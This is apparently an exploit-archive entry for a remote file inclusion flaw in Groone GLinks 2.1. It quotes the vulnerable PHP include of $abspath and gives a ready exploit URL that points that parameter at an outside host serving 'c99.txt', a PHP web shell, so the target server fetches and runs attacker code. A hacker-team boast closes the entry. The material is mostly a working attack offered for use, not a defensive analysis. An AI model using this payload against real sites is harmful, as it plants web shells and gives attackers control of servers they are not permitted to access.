id: 4782
date: 02/03/2009
title: Groone GLinks 2.1 Remote File Inclusion Vulnerability
author: k3vin mitnick
cves: 

=====================================================
Groone GLinks 2.1 Remote File Inclusion Vulnerability
=====================================================


#########################################################
# GLINKS v2.1 Remote File Include Vulnerability
# http://www.groonesworld.com/programs/glinks/glinks.zip
#=========================================================
#
#        bug : <style type="text/css">
#                      <?php include($abspath.'/css/style.inc'); ?>
#                </style>
# 
# exploit   :
#  http://localhost/glinks/includes/header.php?abspath=http://www.evilc0der.com/c99.txt?
#
#
#
##########################################################
>
 .:: Tunisian Blackhat team work with scarface-team many suprise as soon ::.

> ###################################################



#  0day.today [2023-03-26]  #